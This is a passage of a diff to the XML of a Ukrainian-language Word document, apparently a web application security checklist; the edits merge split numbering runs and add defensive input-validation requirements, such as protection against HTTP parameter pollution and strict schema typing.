@@ -14907,17 +14737,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.7</w:t>
+              <w:t>3.7</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15114,17 +14934,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.8</w:t>
+              <w:t>3.8</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15395,17 +15205,7 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.9</w:t>
+              <w:t>3.9</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15990,17 +15790,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.1</w:t>
+              <w:t>4.1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -16291,17 +16081,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.2</w:t>
+              <w:t>4.2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -16600,17 +16380,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.3</w:t>
+              <w:t>4.3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -16852,17 +16622,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.4</w:t>
+              <w:t>4.4</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -17111,17 +16871,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.5</w:t>
+              <w:t>4.5</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -17304,17 +17054,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.6</w:t>
+              <w:t>4.6</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -17473,17 +17213,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ін'єкці</w:t>
+              <w:t xml:space="preserve"> ін'єкці</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -17655,17 +17385,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.7</w:t>
+              <w:t>4.7</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18002,17 +17722,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.8</w:t>
+              <w:t>4.8</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18160,8 +17870,6 @@
               </w:rPr>
               <w:t>.</w:t>
             </w:r>
-            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="0"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -18313,17 +18021,7 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.9</w:t>
+              <w:t>4.9</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18357,9 +18055,119 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся, що програма має захист від атак забруднення параметрів </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>HTTP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, особливо якщо фреймворк не </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>розріщняє</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> джерело параметрів запиту (</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>GET</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>POST</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>cookies</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, заголовки, навколишнього середовища і т.д.)</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -18392,7 +18200,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18427,7 +18235,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18462,7 +18270,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18510,17 +18318,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.10</w:t>
+              <w:t>4.10</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18554,9 +18352,657 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся, що перевірк</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>а</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> на стороні клієнта використовується в якості другої лінії оборони, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">разом з </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> перевірк</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ою</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> на стороні сервера.</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.11</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся в тому, що структуровані дані </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>строго</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> типізован</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>і</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> і звіряються</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> з</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> певною схемою, включаючи допустимі символи, довжини і структури (наприклад, номери кредитних карт або по телефону</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
